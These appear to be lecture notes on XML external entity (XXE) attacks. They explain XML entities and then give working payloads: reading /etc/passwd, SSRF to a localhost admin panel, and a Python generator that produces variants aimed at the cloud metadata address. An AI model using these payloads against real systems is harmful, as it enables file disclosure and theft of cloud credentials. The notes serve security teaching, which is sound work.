# XXE Lecture Notes

## 1. Introduction to XML

### What is XML?

XML stands for **Extensible Markup Language**, a flexible, structured format designed for storing, transporting, and describing data. It is both human-readable and machine-parseable.

### Core Concepts

* **Self-describing data**: XML stores both data and metadata (tags).
* **Hierarchical structure**: Similar to HTML, XML documents are nested and tree-like.
* **Extensibility**: Unlike HTML, the tags are not predefined; developers create their own tags.
* **Used across many industries**: APIs, configuration files, document formats (like Microsoft Office), SVGs, and many legacy websites use XML.

## 2. What is an Entity in XML?

### Definition

An **entity** in XML is essentially a **macro or variable** that gets expanded by the XML processor. Entities are defined inside a **DOCTYPE** declaration. There are three major types:

1. **Internal Entities** – Defined inside the document.
2. **External Entities** – Loaded from external resources.
3. **Parameter Entities** – Used within DTDs.

### Internal Entity Example

```xml
<!ENTITY message "hello">
```

Later usage:

```xml
<body>&message;</body>
```

This behaves like a constant substitution: the parser replaces `&message;` with `hello`.

### Why Entities Exist

Entities originated in SGML (XML’s ancestor). In the early days, they were used to reuse content, include templates, or include text files. Today they are mostly unnecessary but still supported, and therefore dangerous.

## 3. What is an External Entity?

### Definition

An **external entity** is an XML entity whose value does not come from the XML document itself but from an external source, typically:

* A file on the server (`file://…`)
* A remote URL (`http://…`)
* A network share
* A custom protocol handler

### Example (from the slide)

```xml
<!ENTITY xxe SYSTEM "file:///etc/passwd">
```

This tells the XML parser: “when you expand `&xxe;`, fetch the contents of this external file.”

### Why is this Dangerous?

If an application:

* Accepts user-controlled XML
* Uses a parser that allows entity expansion
* Echoes back the parsed content or processes it further

…then the attacker can force the server to read files and return them.

## 4. How XXE Becomes an Attack

### Common Attack Capabilities:

1. **Local File Disclosure**
   Read arbitrary server files (`/etc/passwd`, application configs, keys).

2. **Server-Side Request Forgery (SSRF)**
   External entities can reference URLs. Because the server itself fetches the URL, the request is made from the server's network position and with the server's permissions, so it can reach internal resources that an outside client cannot. Example:

   ```xml
   <!ENTITY xxe SYSTEM "http://localhost:8080/admin">
   ```

3. **Port Scanning / Network Recon**
   Servers with access to internal networks can be probed via URL-based entities.

## 5. Typical Attack Strategy (Expanded)

### 1. Intercept Requests in Burp Suite

Use Burp to:

* Capture the XML payload the server expects
* Identify where injection opportunities exist

### 2. Craft a Malicious Payload

Example attack payload for reading files:

```xml
<?xml version="1.0"?>
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<root>&xxe;</root>
```

### 3. Test for Responses

* Does the server reflect the entity content in the response?
* Does it log the content somewhere you can see?
* Does it process XML further upstream?

### 4. Escalate

If file reads work, try:

* SSRF
* Enumerating the local filesystem
* Fetching cloud metadata (e.g., AWS `169.254.169.254`)
* Accessing internal admin panels
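
When moving from the file-read payload in step 2 to these escalation targets, only the `SYSTEM` URI changes. The Python sketch below shows one way to generate the variants. The names `build_xxe_payload` and `ESCALATION_TARGETS` are hypothetical helpers for these notes, and the `http://` scheme and root path on the metadata address are assumptions, since the notes give only the IP.

```python
def build_xxe_payload(system_uri: str,
                      root_tag: str = "root",
                      entity_name: str = "xxe") -> str:
    """Return an XML document whose root element references an external entity.

    Hypothetical helper: it mirrors the payload from step 2 and only swaps
    the SYSTEM URI.
    """
    # The URI is placed inside a double-quoted system literal, so it must not
    # contain a double quote itself.
    if '"' in system_uri:
        raise ValueError("system_uri must not contain a double quote")
    return (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [ <!ENTITY {entity_name} SYSTEM "{system_uri}"> ]>\n'
        f"<{root_tag}>&{entity_name};</{root_tag}>"
    )


# Targets taken from the examples in these notes. The scheme and trailing
# slash on the metadata address are assumptions (only the IP is given).
ESCALATION_TARGETS = [
    "file:///etc/passwd",            # local file disclosure
    "http://localhost:8080/admin",   # internal admin panel via SSRF
    "http://169.254.169.254/",       # cloud metadata address
]

if __name__ == "__main__":
    for uri in ESCALATION_TARGETS:
        print(build_xxe_payload(uri))
        print("-" * 40)
```

Each generated document can be pasted into the request captured in step 1. The root tag should be changed to match whatever element the target application actually expects.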